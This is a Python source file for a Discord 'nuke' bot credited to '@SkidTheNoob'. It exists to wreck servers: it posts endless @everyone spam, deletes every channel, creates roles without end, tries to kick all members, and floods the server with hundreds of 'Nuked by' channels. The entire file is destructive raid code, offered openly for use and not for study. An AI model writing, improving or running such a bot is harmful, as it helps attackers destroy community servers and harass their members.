import discord
from discord.ext.commands import *
from discord.ext import commands
import random
import asyncio
import time
import json
from itertools import cycle
import time
from threading import Thread
from random import randint
import datetime
import os
import aiohttp
import sys
import traceback
import json
from discord.utils import get
 
 
 
bot = commands.Bot(command_prefix='?')
 
client = commands.Bot(command_prefix='?')
 

bot.remove_command('help')
 
 

@bot.event
async def on_ready():
    print("Spam bot is ready, enjoy your dirty deeds :)")
    print(f"Bot Status: Ready! - @SkidTheNoob")
 
  
 

@bot.command(pass_context=True)
async def p(ctx):
    await ctx.message.delete()
    while True:
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n") 
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
        await ctx.send("Skiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\nSkiddy ran this cord!@everyone\n")
 
 
@bot.command(pass_context=True)
async def d(ctx):
    guild = ctx.guild
    for channel in guild.channels:
        await channel.delete()
        
@bot.command(pass_context=True)
async def r(ctx):
    await ctx.message.delete()
    while True:
        guild = ctx.guild
        await guild.create_role(name="skiddy owns you lol HhackedhackedckEd HackEd HackEd")
 

@bot.command(pass_context=True)
async def h(ctx):
        for user in list(ctx.message.server.members):
            try:
                await client.kick(user)
                print ("User " + user.name + " has been kicked from " + ctx.message.server.name)
            except:
                pass
        print ("Action Completed: kall")
 
@bot.command(pass_context=True)
async def c(ctx):
    await ctx.message.delete()
    guild = ctx.message.guild
    await guild.create_text_channel('Nuked by @SkidTheNoob') 
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('nuked by @skidthenoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
